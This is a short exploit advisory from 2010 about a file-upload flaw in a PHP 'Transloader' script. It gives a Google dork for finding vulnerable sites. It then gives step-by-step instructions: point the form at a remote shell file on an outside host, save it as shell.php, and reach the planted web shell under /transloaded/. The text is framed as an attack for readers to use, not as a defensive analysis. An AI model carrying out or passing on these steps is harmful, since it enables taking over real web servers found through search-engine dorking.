# Exploit Title: Translod Script Uplaod Vulnerability
# Date: 16.01.2010
# Author: DigitALL
# Web Site : www.digitallsecurity.org<http://www.digitallsecurity.org>
# Thanks : Zombie KroNickq NoFearx38 And All 1923Turk.Com Members
# Software Link: http://somik.org/requests/transloader.zip
# Version: 1.0
# Code :
Google Dork: "Transloader by Somik.org" or "Transloader by" or "Transloder"etc etc
From (http://): Your Shell Link (Example http://www.digitallsecurity.org/dosyalar/xx.txt)
To (filename): Shell Name (Example: shell.php)
And Submit Form.Your Shell Upload a /transloaded/shell.php